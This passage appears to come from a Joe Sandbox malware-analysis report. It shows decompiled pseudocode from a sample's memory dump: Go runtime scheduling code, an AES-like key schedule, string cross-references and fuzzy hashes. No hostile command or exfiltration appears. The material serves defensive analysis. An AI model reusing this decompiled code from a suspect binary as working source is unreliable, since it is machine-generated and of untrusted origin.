				signed long long _t157;
				char* _t160;
				intOrPtr* _t162;
				signed long long _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				intOrPtr _t177;
				void* _t183;

				_t143 = __rdx;
				_t138 = __rcx;
				_t135 = __rbx;
				_t117 = __rax;
				_t107 = __esp;
				_t103 = __edi;
				_t93 = __ecx;
				_t87 = __ebx;
				_v8 = __rbp;
				_t160 =  &_v8;
				_a8 = __rax;
				_a20 = __ecx;
				_a16 = __ebx;
				asm("bt ebx, 0xc");
				if(__eflags < 0) {
					L3:
					asm("inc esp");
					_v24 = 0x13352a0;
					_v16 = _t87;
					_v12 = _t93;
					 *_t162 =  &_v24;
					E013560C0(_t87, _t93, _t98, _t103, _t104, _t106, _t107, _t116, _t160, _t164, _t165, _t166, _t167, _t183);
					asm("inc ebp");
					_t117 = _a8;
					_t93 = _a20;
					_t87 = _a16;
					L4:
					_t99 = 0;
					while(1) {
						_t152 = _t117;
						_t70 = _t87;
						asm("lock cmpxchg [edi+0x90], ecx");
						r8b = _t109 == 0;
						if(r8b != 0) {
							goto L14;
						}
						if(_t87 != 4 ||  *((intOrPtr*)(_t152 + 0x90)) != 1) {
							_v32 = _t143;
							if(_t143 == 0) {
								_t70 = E0135A180(_t70);
								asm("inc ebp");
								_t20 =  *_t162 + 0x1388; // 0x1388
								_t154 = _t20;
							}
							_v40 = _t154;
							E0135A180(_t70);
							asm("inc ebp");
							_t177 =  *((intOrPtr*)( *[gs:0x28]));
							_t123 = _v40;
							if( *_t162 >= _t123) {
								 *_t162 = 0x1401740;
								_t74 = E013560C0(_t87, _t93, _t99, _t103, 0, _t106, _t107, _t116, _t160, _t164, _t165, _t166, _t177, _t183);
								asm("inc ebp");
								E0135A180(_t74);
								asm("inc ebp");
								_t177 =  *((intOrPtr*)( *[gs:0x28]));
								_t25 =  *_t162 + 0x9c4; // 0x9c4
								_t154 = _t25;
								goto L5;
							} else {
								_t99 = _a16;
								_t155 = _a8;
								L37:
								if(_t138 >= 0xa) {
									L39:
									_t154 = _t123;
									L5:
									_t143 = _v32 + 1;
									_t117 = _a8;
									_t93 = _a20;
									_t87 = _a16;
									continue;
								}
								_t109 =  *((intOrPtr*)(_t155 + 0x90)) - _t99;
								if(_t109 != 0) {
									L36:
									_v48 = _t138;
									 *_t162 = 1;
									E01357FE0();
									asm("inc ebp");
									_t138 = _v48 + 1;
									_t123 = _v40;
									_t99 = _a16;
									_t155 = _a8;
									goto L37;
								}
								goto L39;
							}
						} else {
							_t130 = 0x138e5f0;
							E01330BA0(0x138e5f0, _t135, _t160);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							L41:
							__eflags = _t162 -  *((intOrPtr*)(_t177 + 0x10));
							if(_t162 >  *((intOrPtr*)(_t177 + 0x10))) {
								_t162 = _t162 - 0x28;
								_v72 = _t160;
								_t160 =  &_v72;
								_v80 = _t130;
								_v88 = _t138;
								E01332340(_t143, _t160, _t177);
								E01332C40( *((intOrPtr*)(_t143 + 8)), _t103, 0, _t107, 0x138baf4, _t135, _t160, _t177);
								L01332AA0(_t99, _t103, _t107, _v88, _t138, _t160, _t177);
								E01332C40( *((intOrPtr*)(_t143 + 8)), _t103, 0, _t107, 0x1386f6d, _t135, _t160, _t177);
								L01332AA0(_t99, _t103, _t107, _v80, _t138, _t160, _t177);
								E013325A0( *((intOrPtr*)(_t143 + 8)), _t99, _t103, 0, _t107, _t160, _t177);
								L013323C0(_t143, _t160, _t177);
								_t130 = 0x138c37f;
								E01330BA0(0x138c37f, _t135, _t160);
							}
							E01356160(_t143, _t160);
							goto L41;
						}
						L14:
						__eflags = _t87 - 2;
						if(_t87 == 2) {
							_t100 =  *(_t152 + 0xbd) & 0x000000ff;
							__eflags = _t100 & 0x00000007;
							if((_t100 & 0x00000007) == 0) {
								 *((char*)(_t152 + 0xbc)) = 1;
							}
							_t102 = ( *(_t152 + 0xbd) & 0x000000ff) + 1;
							__eflags = _t102;
							 *(_t152 + 0xbd) = _t102;
						}
						__eflags =  *((char*)(_t152 + 0xbc));
						if( *((char*)(_t152 + 0xbc)) == 0) {
							L34:
							return _t70;
						} else {
							__eflags = _t87 - 1;
							if(_t87 == 1) {
								_t70 = E0135A180(_t70);
								asm("inc ebp");
								_t138 = _a8;
								_t35 = _t138 + 0xc8;
								 *_t35 =  *(_t138 + 0xc8) +  *_t162 -  *((intOrPtr*)(_t138 + 0xc0));
								__eflags =  *_t35;
								 *((long long*)(_t138 + 0xc0)) = 0;
								_t93 = _a20;
								_t152 = _a8;
							}
							__eflags = _t93 - 1;
							if(_t93 == 1) {
								_t70 = E0135A180(_t70);
								asm("inc ebp");
								 *((long long*)(_a8 + 0xc0)) =  *_t162;
								goto L34;
							} else {
								__eflags = _t93 - 2;
								if(_t93 != 2) {
									goto L34;
								}
								 *((char*)(_t152 + 0xbc)) = 0;
								_t144 =  *((intOrPtr*)(_t152 + 0xc8));
								__eflags = _t144;
								if(_t144 >= 0) {
									__eflags = _t144 - 0x10;
									if(_t144 < 0x10) {
										r8d = 0;
										__eflags = r8d;
										_t135 = _t144;
									} else {
										asm("dec eax");
										_t135 =  ==  ? 0xffffffff : _t135;
										_t157 = _t135 - 3;
										_t163 = _t157;
										__eflags = _t157 << 4 - 0x2d0;
										if(_t157 << 4 < 0x2d0) {
											_t141 = _t135 - 4;
											__eflags = _t141 - 0x40;
											asm("dec eax");
											_t138 = _t141 |  !_t135;
											_t135 = (_t144 >> _t93) - ((_t144 >> _t93 >> 0x3f >> 0x3c) + _t146 >> 4 << 4);
										} else {
											r8d = 0x2c;
										}
									}
									_t163 = _t163 << 4;
									_t121 = _t163 + _t135;
									__eflags = _t121 - 0x2d0;
									if(_t121 >= 0x2d0) {
										E013588E0();
										goto L36;
									} else {
										asm("lock dec eax");
										L32:
										 *((long long*)(_t152 + 0xc8)) = 0;
										goto L34;
									}
								}
								_t70 = 1;
								asm("lock dec eax");
								goto L32;
							}
						}
					}
				}
				asm("bt ecx, 0xc");
				if(__eflags < 0) {
					goto L3;
				}
				_t109 = __ebx - __ecx;
				if(_t109 != 0) {
					goto L4;
				}
				goto L3;
			}

















































                                                                                                                            0x01334f00
                                                                                                                            0x01334f00
                                                                                                                            0x01334f00
                                                                                                                            0x01334f00
                                                                                                                            0x01334f00
                                                                                                                            0x01334f00
                                                                                                                            0x01334f00
                                                                                                                            0x01334f00
                                                                                                                            0x01334f04
                                                                                                                            0x01334f09
                                                                                                                            0x01334f0e
                                                                                                                            0x01334f13
                                                                                                                            0x01334f17
                                                                                                                            0x01334f1b
                                                                                                                            0x01334f20
                                                                                                                            0x01334f2c
                                                                                                                            0x01334f2c
                                                                                                                            0x01334f39
                                                                                                                            0x01334f3e
                                                                                                                            0x01334f42
                                                                                                                            0x01334f4b
                                                                                                                            0x01334f4f
                                                                                                                            0x01334f54
                                                                                                                            0x01334f68
                                                                                                                            0x01334f6d
                                                                                                                            0x01334f71
                                                                                                                            0x01334f75
                                                                                                                            0x01334f75
                                                                                                                            0x01334f91
                                                                                                                            0x01334f91
                                                                                                                            0x01334f94
                                                                                                                            0x01334f96
                                                                                                                            0x01334f9e
                                                                                                                            0x01334fa5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01334fae
                                                                                                                            0x01334fbd
                                                                                                                            0x01334fc5
                                                                                                                            0x01334fc7
                                                                                                                            0x01334fcc
                                                                                                                            0x01334fe4
                                                                                                                            0x01334fe4
                                                                                                                            0x01334fe4
                                                                                                                            0x01334feb
                                                                                                                            0x01334ff0
                                                                                                                            0x01334ff5
                                                                                                                            0x01335002
                                                                                                                            0x01335009
                                                                                                                            0x01335012
                                                                                                                            0x0133502c
                                                                                                                            0x01335030
                                                                                                                            0x01335035
                                                                                                                            0x01335049
                                                                                                                            0x0133504e
                                                                                                                            0x0133505b
                                                                                                                            0x01335066
                                                                                                                            0x01335066
                                                                                                                            0x00000000
                                                                                                                            0x01335014
                                                                                                                            0x01335014
                                                                                                                            0x01335018
                                                                                                                            0x01335252
                                                                                                                            0x01335256
                                                                                                                            0x01335268
                                                                                                                            0x01335268
                                                                                                                            0x01334f7b
                                                                                                                            0x01334f80
                                                                                                                            0x01334f84
                                                                                                                            0x01334f89
                                                                                                                            0x01334f8d
                                                                                                                            0x00000000
                                                                                                                            0x01334f8d
                                                                                                                            0x01335260
                                                                                                                            0x01335266
                                                                                                                            0x0133520d
                                                                                                                            0x0133520d
                                                                                                                            0x01335212
                                                                                                                            0x01335219
                                                                                                                            0x0133521e
                                                                                                                            0x01335237
                                                                                                                            0x01335244
                                                                                                                            0x01335249
                                                                                                                            0x0133524d
                                                                                                                            0x00000000
                                                                                                                            0x0133524d
                                                                                                                            0x00000000
                                                                                                                            0x01335266
                                                                                                                            0x01335270
                                                                                                                            0x01335270
                                                                                                                            0x01335280
                                                                                                                            0x01335286
                                                                                                                            0x01335287
                                                                                                                            0x01335288
                                                                                                                            0x01335289
                                                                                                                            0x0133528a
                                                                                                                            0x0133528b
                                                                                                                            0x0133528c
                                                                                                                            0x0133528d
                                                                                                                            0x0133528e
                                                                                                                            0x0133528f
                                                                                                                            0x01335290
                                                                                                                            0x01335291
                                                                                                                            0x01335292
                                                                                                                            0x01335293
                                                                                                                            0x01335294
                                                                                                                            0x01335295
                                                                                                                            0x01335296
                                                                                                                            0x01335297
                                                                                                                            0x01335298
                                                                                                                            0x01335299
                                                                                                                            0x0133529a
                                                                                                                            0x0133529b
                                                                                                                            0x0133529c
                                                                                                                            0x0133529d
                                                                                                                            0x0133529e
                                                                                                                            0x0133529f
                                                                                                                            0x013352a0
                                                                                                                            0x013352a0
                                                                                                                            0x013352a4
                                                                                                                            0x013352aa
                                                                                                                            0x013352ae
                                                                                                                            0x013352b3
                                                                                                                            0x013352bb
                                                                                                                            0x013352c3
                                                                                                                            0x013352c8
                                                                                                                            0x013352d9
                                                                                                                            0x013352e3
                                                                                                                            0x013352f4
                                                                                                                            0x01335300
                                                                                                                            0x01335305
                                                                                                                            0x0133530a
                                                                                                                            0x0133530f
                                                                                                                            0x01335320
                                                                                                                            0x01335320
                                                                                                                            0x01335326
                                                                                                                            0x00000000
                                                                                                                            0x01335326
                                                                                                                            0x01335072
                                                                                                                            0x01335072
                                                                                                                            0x01335075
                                                                                                                            0x01335077
                                                                                                                            0x01335080
                                                                                                                            0x01335083
                                                                                                                            0x01335085
                                                                                                                            0x01335085
                                                                                                                            0x01335093
                                                                                                                            0x01335093
                                                                                                                            0x01335095
                                                                                                                            0x01335095
                                                                                                                            0x0133509b
                                                                                                                            0x013350a2
                                                                                                                            0x013351f9
                                                                                                                            0x01335202
                                                                                                                            0x013350a8
                                                                                                                            0x013350a8
                                                                                                                            0x013350ab
                                                                                                                            0x013350ae
                                                                                                                            0x013350b3
                                                                                                                            0x013350cb
                                                                                                                            0x013350d7
                                                                                                                            0x013350d7
                                                                                                                            0x013350d7
                                                                                                                            0x013350de
                                                                                                                            0x013350e9
                                                                                                                            0x013350ed
                                                                                                                            0x013350ed
                                                                                                                            0x013350f2
                                                                                                                            0x013350f5
                                                                                                                            0x013351d0
                                                                                                                            0x013351d5
                                                                                                                            0x013351f2
                                                                                                                            0x00000000
                                                                                                                            0x01335100
                                                                                                                            0x01335100
                                                                                                                            0x01335103
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01335109
                                                                                                                            0x01335110
                                                                                                                            0x01335117
                                                                                                                            0x0133511a
                                                                                                                            0x01335132
                                                                                                                            0x01335136
                                                                                                                            0x01335197
                                                                                                                            0x01335197
                                                                                                                            0x0133519a
                                                                                                                            0x01335138
                                                                                                                            0x01335138
                                                                                                                            0x01335143
                                                                                                                            0x01335147
                                                                                                                            0x0133514b
                                                                                                                            0x01335152
                                                                                                                            0x01335159
                                                                                                                            0x01335168
                                                                                                                            0x0133516c
                                                                                                                            0x01335170
                                                                                                                            0x01335176
                                                                                                                            0x01335192
                                                                                                                            0x0133515b
                                                                                                                            0x0133515b
                                                                                                                            0x01335161
                                                                                                                            0x01335159
                                                                                                                            0x0133519d
                                                                                                                            0x013351a1
                                                                                                                            0x013351a5
                                                                                                                            0x013351ab
                                                                                                                            0x01335208
                                                                                                                            0x00000000
                                                                                                                            0x013351ad
                                                                                                                            0x013351bd
                                                                                                                            0x013351c2
                                                                                                                            0x013351c2
                                                                                                                            0x00000000
                                                                                                                            0x013351c2
                                                                                                                            0x013351ab
                                                                                                                            0x0133511c
                                                                                                                            0x01335128
                                                                                                                            0x00000000
                                                                                                                            0x01335128
                                                                                                                            0x013350f5
                                                                                                                            0x013350a2
                                                                                                                            0x01334f91
                                                                                                                            0x01334f22
                                                                                                                            0x01334f26
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01334f28
                                                                                                                            0x01334f2a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            Strings
                                                                                                                            • newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_, xrefs: 013352E8
                                                                                                                            • casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unex, xrefs: 01335270
                                                                                                                            • casgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorresetspinnin, xrefs: 0133530F
                                                                                                                            • runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNor, xrefs: 013352CD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_$casgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorresetspinnin$casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unex$runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNor
                                                                                                                            • API String ID: 0-3782697299
                                                                                                                            • Opcode ID: 8ddc95c8b6f3c4def2a011be4e87d4b9a5b52e39dc0a574bcecad35db63f1e98
                                                                                                                            • Instruction ID: c9612337a39e22b6dc421ddb254cc91f855ead8b2bf6a6845ff5a528a89a0b3b
                                                                                                                            • Opcode Fuzzy Hash: 8ddc95c8b6f3c4def2a011be4e87d4b9a5b52e39dc0a574bcecad35db63f1e98
                                                                                                                            • Instruction Fuzzy Hash: 45A1C236705B85C6EB04CB29E48439EBB61F39AB98F448222EF9D43B65DF39C545CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A86190 Relevance: 4.6, Strings: 3, Instructions: 884COMMONLIBRARYCODECrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0000025B25BF8A86190(intOrPtr __edx, void* __edi, void* __esp, void* __rax, long long __rcx, long long __r9, intOrPtr _a4, long long _a8, intOrPtr _a12, intOrPtr _a16, signed long long _a20, intOrPtr _a24, long long _a32) {
				signed long long _v4;
				signed long long _v28;
				signed long long _v36;
				signed long long _v44;
				signed long long _v52;
				void* _v60;
				signed long long _v68;
				intOrPtr _v76;
				signed int _v80;
				signed long long _v84;
				signed int _t498;
				signed int _t528;
				signed int _t578;
				signed int _t595;
				signed long long _t894;
				signed long long _t895;
				signed long long _t896;
				signed long long _t897;
				signed long long _t898;
				signed long long _t899;
				signed long long _t900;
				signed long long _t901;
				signed long long _t902;
				signed long long _t905;
				signed long long _t906;
				signed long long _t910;
				signed long long _t911;
				signed long long _t912;
				signed long long _t913;
				signed long long _t914;
				signed long long _t915;
				signed long long _t918;
				signed long long _t919;
				signed long long _t920;
				signed long long _t921;
				signed long long _t925;
				signed long long _t926;
				signed long long _t927;
				signed long long _t928;
				signed long long _t929;
				signed long long _t930;
				signed long long _t931;
				signed long long _t932;
				signed long long _t933;
				signed long long _t965;
				signed long long _t966;
				signed long long _t967;
				signed long long _t968;
				signed long long _t969;
				signed long long _t973;
				signed long long _t974;
				signed long long _t978;
				signed long long _t979;
				signed long long _t983;
				signed long long _t984;
				signed long long _t988;
				signed long long _t989;
				signed long long _t995;
				signed long long _t996;
				signed long long _t997;
				signed long long _t998;
				signed long long _t999;
				signed long long _t1000;
				signed long long _t1003;
				signed long long _t1004;
				signed long long _t1008;
				signed long long _t1009;
				signed long long _t1017;
				signed long long _t1018;
				signed long long _t1019;
				signed long long _t1020;
				signed long long _t1021;
				signed long long _t1022;
				signed long long _t1023;
				signed long long _t1024;
				signed long long _t1025;
				signed long long _t1026;
				signed long long _t1029;
				signed long long _t1030;
				signed long long _t1034;
				signed long long _t1035;
				signed long long _t1039;
				signed long long _t1040;
				signed long long _t1044;
				signed long long _t1045;
				signed long long _t1053;
				signed long long _t1054;
				signed long long _t1055;
				signed long long _t1056;
				signed long long _t1057;
				signed long long _t1058;
				signed long long _t1062;
				signed long long _t1063;
				signed long long _t1064;
				signed long long _t1065;
				signed long long _t1066;
				signed long long _t1067;
				signed long long _t1168;
				signed long long _t1171;
				signed long long _t1174;

				_a32 = __r9;
				_a24 = r8d;
				_a16 = __edx;
				_a8 = __rcx;
				memset(__edi, 0xcccccccc, 0x18 << 2);
				if (_a4 == 0x10) goto 0xf8a861db;
				if (_a4 == 0x18) goto 0xf8a861db;
				if (_a4 == 0x20) goto 0xf8a861db;
				goto 0xf8a87048;
				if (_a12 == 0) goto 0xf8a86209;
				asm("cdq");
				if (_a12 == __rax + __rax + 6) goto 0xf8a86209;
				goto 0xf8a87048;
				asm("cdq");
				 *((intOrPtr*)(_a20 + 0x1e0)) = __rax + __rax + 6;
				_v84 = 0;
				_t894 = _a20;
				_v68 = _t894;
				_t895 = _t894 * 0;
				_t973 = _v4;
				_t974 = _t973;
				 *(_v68 + _t974 * 2 * 3 * 0) = ( *(_t973 + _t895) & 0xff) << 0x00000018 | ( *(_v4 + _t974) & 0xff) << 0x00000010 | ( *(_v4 + _t974 * 2) & 0xff) << 0x00000008 |  *(_v4 + _t974 * 2 * 3) & 0xff;
				_t896 = _t895 * 0;
				_t978 = _v4;
				_t979 = _t978;
				 *(_v68 + _t979 * 2 * 3) = ( *(_t978 + _t896 + 4) & 0xff) << 0x00000018 | ( *(_v4 + _t979 + 4) & 0xff) << 0x00000010 | ( *(_v4 + 4 + _t979 * 2) & 0xff) << 0x00000008 |  *(_v4 + 4 + _t979 * 2 * 3) & 0xff;
				_t897 = _t896 * 0;
				_t983 = _v4;
				_t984 = _t983;
				 *(_v68 + _t984 * 2 * 3 * 2) = ( *(_t983 + _t897 + 8) & 0xff) << 0x00000018 | ( *(_v4 + _t984 + 8) & 0xff) << 0x00000010 | ( *(_v4 + 8 + _t984 * 2) & 0xff) << 0x00000008 |  *(_v4 + 8 + _t984 * 2 * 3) & 0xff;
				_t898 = _t897 * 0;
				_t988 = _v4;
				_t989 = _t988;
				 *(_v68 + _t989 * 2 * 3 * 3) = ( *(_t988 + _t898 + 0xc) & 0xff) << 0x00000018 | ( *(_v4 + _t989 + 0xc) & 0xff) << 0x00000010 | ( *(_v4 + 0xc + _t989 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0xc + _t989 * 2 * 3) & 0xff;
				if (_a4 != 0x10) goto 0xf8a86582;
				_v80 = 0x2c;
				_t899 = _t898 * 3;
				_v76 =  *((intOrPtr*)(_v68 + _t899));
				_t900 = _t899 * 0;
				_v52 = _t900;
				_t498 = E0000025B25BF8A88770(_v76, _t900, _v68);
				_t995 = _v84;
				_t996 = _t995 * 4;
				 *(_v68 + _t996) =  *(_v68 + _v52) ^ _t498 ^  *("Changing the code in this way will not affect the quality of the resulting optimized code.\n\r" + _t995 * 4);
				_t901 = _t900;
				_t997 = _t996 * 4;
				_t998 = _t997 * 5;
				 *(_v68 + _t998) =  *(_v68 + _t901) ^  *(_v68 + _t997);
				_t902 = _t901 * 2;
				_t999 = _t998 * 5;
				_t1000 = _t999 * 6;
				 *(_v68 + _t1000) =  *(_v68 + _t902) ^  *(_v68 + _t999);
				 *(_v68 + _t1000 * 6 * 7) =  *(_v68 + _t902 * 3) ^  *(_v68 + _t1000 * 6);
				_v84 = _v84 + 1;
				if (_v84 != 0xa) goto 0xf8a8656a;
				goto 0xf8a8657d;
				_t905 = _v68 + 0x10;
				_v68 = _t905;
				goto 0xf8a86458;
				goto 0xf8a86c9b;
				if (_a4 != 0x18) goto 0xf8a86843;
				_v80 = 0x34;
				_t906 = _t905 * 0;
				_t1003 = _v4;
				_t1004 = _t1003;
				 *(_v68 + _t1004 * 2 * 3 * 4) = ( *(_t1003 + _t906 + 0x10) & 0xff) << 0x00000018 | ( *(_v4 + _t1004 + 0x10) & 0xff) << 0x00000010 | ( *(_v4 + 0x10 + _t1004 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x10 + _t1004 * 2 * 3) & 0xff;
				_t1008 = _v4;
				_t1009 = _t1008;
				 *(_v68 + _t1009 * 2 * 3 * 5) = ( *(_t1008 + 0x14 + _t906 * 0) & 0xff) << 0x00000018 | ( *(_v4 + _t1009 + 0x14) & 0xff) << 0x00000010 | ( *(_v4 + 0x14 + _t1009 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x14 + _t1009 * 2 * 3) & 0xff;
				_t910 = _v68 - _a20 >> 2;
				_v76 =  *((intOrPtr*)(_a20 + 0x14 + _t910 * 4));
				_t911 = _t910 * 0;
				_v44 = _t911;
				_t528 = E0000025B25BF8A88770(_v76, _t911, _v68);
				_t1017 = _v84;
				_t1018 = _t1017 * 6;
				 *(_v68 + _t1018) =  *(_v68 + _v44) ^ _t528 ^  *("Changing the code in this way will not affect the quality of the resulting optimized code.\n\r" + _t1017 * 4);
				_t912 = _t911;
				_t1019 = _t1018 * 6;
				_t1020 = _t1019 * 7;
				 *(_v68 + _t1020) =  *(_v68 + _t912) ^  *(_v68 + _t1019);
				_t913 = _t912 * 2;
				_t1021 = _t1020 * 7;
				_t1022 = _t1021 * 8;
				 *(_v68 + _t1022) =  *(_v68 + _t913) ^  *(_v68 + _t1021);
				_t914 = _t913 * 3;
				_t1023 = _t1022 * 8;
				_t1024 = _t1023 * 9;
				 *(_v68 + _t1024) =  *(_v68 + _t914) ^  *(_v68 + _t1023);
				_v84 = _v84 + 1;
				if (_v84 != 8) goto 0xf8a867bf;
				goto 0xf8a8683e;
				_t915 = _t914 * 4;
				_t1025 = _t1024 * 9;
				_t1026 = _t1025 * 0xa;
				 *(_v68 + _t1026) =  *(_v68 + _t915) ^  *(_v68 + _t1025);
				 *(_v68 + _t1026 * 0xa * 0xb) =  *(_v68 + _t915 * 5) ^  *(_v68 + _t1026 * 0xa);
				_t918 = _v68 + 0x18;
				_v68 = _t918;
				goto 0xf8a8669b;
				goto 0xf8a86c9b;
				if (_a4 != 0x20) goto 0xf8a86c91;
				_v80 = 0x3c;
				_t919 = _t918 * 0;
				_t1029 = _v4;
				_t1030 = _t1029;
				 *(_v68 + _t1030 * 2 * 3 * 4) = ( *(_t1029 + _t919 + 0x10) & 0xff) << 0x00000018 | ( *(_v4 + _t1030 + 0x10) & 0xff) << 0x00000010 | ( *(_v4 + 0x10 + _t1030 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x10 + _t1030 * 2 * 3) & 0xff;
				_t920 = _t919 * 0;
				_t1034 = _v4;
				_t1035 = _t1034;
				 *(_v68 + _t1035 * 2 * 3 * 5) = ( *(_t1034 + _t920 + 0x14) & 0xff) << 0x00000018 | ( *(_v4 + _t1035 + 0x14) & 0xff) << 0x00000010 | ( *(_v4 + 0x14 + _t1035 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x14 + _t1035 * 2 * 3) & 0xff;
				_t921 = _t920 * 0;
				_t1039 = _v4;
				_t1040 = _t1039;
				 *(_v68 + _t1040 * 2 * 3 * 6) = ( *(_t1039 + _t921 + 0x18) & 0xff) << 0x00000018 | ( *(_v4 + _t1040 + 0x18) & 0xff) << 0x00000010 | ( *(_v4 + 0x18 + _t1040 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x18 + _t1040 * 2 * 3) & 0xff;
				_t1044 = _v4;
				_t1045 = _t1044;
				 *(_v68 + _t1045 * 2 * 3 * 7) = ( *(_t1044 + 0x1c + _t921 * 0) & 0xff) << 0x00000018 | ( *(_v4 + _t1045 + 0x1c) & 0xff) << 0x00000010 | ( *(_v4 + 0x1c + _t1045 * 2) & 0xff) << 0x00000008 |  *(_v4 + 0x1c + _t1045 * 2 * 3) & 0xff;
				_t925 = _v68 - _a20 >> 2;
				_v76 =  *((intOrPtr*)(_a20 + 0x1c + _t925 * 4));
				_t926 = _t925 * 0;
				_v36 = _t926;
				_t578 = E0000025B25BF8A88770(_v76, _t926, _v68);
				_t1053 = _v84;
				_t1054 = _t1053 * 8;
				 *(_v68 + _t1054) =  *(_v68 + _v36) ^ _t578 ^  *("Changing the code in this way will not affect the quality of the resulting optimized code.\n\r" + _t1053 * 4);
				_t927 = _t926;
				_t1055 = _t1054 * 8;
				_t1056 = _t1055 * 9;
				 *(_v68 + _t1056) =  *(_v68 + _t927) ^  *(_v68 + _t1055);
				_t928 = _t927 * 2;
				_t1057 = _t1056 * 9;
				_t1058 = _t1057 * 0xa;
				 *(_v68 + _t1058) =  *(_v68 + _t928) ^  *(_v68 + _t1057);
				_t929 = _t928 * 3;
				 *(_v68 + _t1058 * 0xa * 0xb) =  *(_v68 + _t929) ^  *(_v68 + _t1058 * 0xa);
				_v84 = _v84 + 1;
				if (_v84 != 7) goto 0xf8a86b89;
				goto 0xf8a86c8f;
				_t930 = _t929 * 0xb;
				_v76 =  *((intOrPtr*)(_v68 + _t930));
				_t931 = _t930 * 4;
				_v28 = _t931;
				asm("ror ecx, 0x8");
				_t595 = E0000025B25BF8A88770(_v76, _t931, _v68);
				_t1062 = _v68;
				_t1063 = _t1062 * 0xc;
				 *(_v68 + _t1063) =  *(_t1062 + _v28) ^ _t595;
				_t932 = _t931 * 5;
				_t1064 = _t1063 * 0xc;
				_t1065 = _t1064 * 0xd;
				 *(_v68 + _t1065) =  *(_v68 + _t932) ^  *(_v68 + _t1064);
				_t933 = _t932 * 6;
				_t1066 = _t1065 * 0xd;
				_t1067 = _t1066 * 0xe;
				 *(_v68 + _t1067) =  *(_v68 + _t933) ^  *(_v68 + _t1066);
